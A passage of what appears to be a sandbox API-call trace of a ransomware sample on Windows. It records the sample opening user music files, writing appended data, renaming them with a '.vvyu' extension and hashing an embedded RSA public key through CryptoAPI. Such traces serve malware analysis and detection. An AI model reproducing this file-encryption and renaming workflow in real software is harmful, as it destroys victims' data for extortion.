dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38a78 | out: hHeap=0x6a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.065] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x15f3f, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x15f3f, lpOverlapped=0x0) returned 1 [0187.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.066] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15f44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.067] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.068] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.068] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.069] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.069] CloseHandle (hObject=0x584) returned 1 [0187.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0187.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.071] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\tRcMqrNBqTUs.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\trcmqrnbqtus.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\tRcMqrNBqTUs.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\trcmqrnbqtus.mp3.vvyu")) returned 1 [0187.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.072] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.074] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 1 [0187.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38a78 [0187.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0187.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38a78 | out: hHeap=0x6a0000) returned 1 [0187.075] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\ZruS.wav") returned=".wav" [0187.075] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\ZruS.wav" (normalized: "c:\\users\\keecfmwgj\\music\\zrus.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.077] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=18255) returned 1 [0187.077] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.080] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4729, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.081] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.083] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.083] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x474f, lpOverlapped=0x0) returned 1 [0187.084] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.084] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.084] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.084] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.085] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.085] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.085] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.086] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.086] GetLastError () returned 0x0 [0187.086] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.086] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.086] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.086] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.086] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4750) returned 0x2d43778 [0187.087] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38a78 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0187.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0187.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0187.088] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3bb48 [0187.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d396a0 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.091] GetCurrentThreadId () returned 0x264 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37918 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.092] GetCurrentThreadId () returned 0x264 [0187.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39700 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.094] RtlAllocateHeap (HeapHandle=0x6a0000, 